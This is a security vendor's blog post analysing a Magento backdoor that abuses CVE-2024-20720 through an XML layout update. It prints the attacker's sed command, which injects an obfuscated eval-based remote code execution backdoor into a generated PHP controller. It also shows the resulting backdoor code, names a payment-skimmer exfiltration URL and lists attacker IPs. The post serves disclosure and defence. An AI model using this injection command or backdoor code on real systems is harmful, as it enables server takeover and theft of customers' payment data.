Cybersecurity
_ _ _ 0 Comments

Persistent Magento backdoor hidden in XML

Oops, your XML now contains shell code

Oops, your XML now contains shell code

The following XML code was found in the layout_update database table and is responsible for periodic reinfections of your system.

magecart payload in xml

Attackers combine the Magento layout parser with the beberlei/assert package (installed by default) to execute system commands. Because the layout block is tied to the checkout cart, this command is executed whenever <store>/checkout/cart is requested. In this case, the command is sed, which adds a backdoor to the (automatically generated) CMS controller. Clever, because the malware would be reinjected after a manual fix or a bin/magento setup:di:compile run:

sed -i "s/___init();/___init();\n        if  (  isset  (   $_POST  [   "7faa27b473" ])  )   {\n            $catalogQuery  ="bas" .   "e64_de".   "code" ;\n            @  eval  (  $catalogQuery (  strrev  (  $_POST  ["7faa27b473"] )  ));\n            exit (   0  )   ;\n        }/g" 
        ../generated/code/Magento/Cms/Controller/Index/Index/Interceptor.php

And this leads to a remote code execution backdoor which can be used by POSTing a command to /cms/index

public function __construct(MagentoFrameworkAppActionContext $context, MagentoFrameworkControllerResultForwardFactory $resultForwardFactory, ?MagentoFrameworkAppConfigScopeConfig
{
  $this->___init();
  if  (  isset  (   $_POST  [   "7faa27b473" ])  )   {
    $catalogQuery  ="bas" .   "e64_de".   "code" ;
    @  eval  (  $catalogQuery (  strrev  (  $_POST  ["7faa27b473"] )  ));
    exit (   0  )   ;
  }
  parent::__construct($context, $resultForwardFactory, $scopeConfig, $page);
}

This is the first time that we see actual abuse of CVE-2024-20720, which was discovered just this February by security researcher blaklis.

The attacker used this mechanism to inject a fake Stripe payment skimmer, which would copy payment data to https://halfpriceboxesusa.com/pub/health_check.php (apparently another compromised Magento store).

Next steps for affected merchants

If you are affected, make sure to run our eComscan scanner to uncover any hidden backdoors on your system, see below for a 1-click scan command.

Next, make sure to upgrade your Magento to 2.4.6-p4, 2.4.5-p6 or 2.4.4-p7. See our version matrix for a useful overview.

Attribution

We observed the following attacker IPs:

45.146.54.58
45.146.54.59
45.146.54.61
45.146.54.67
216.73.163.170
216.73.163.182

Read more

7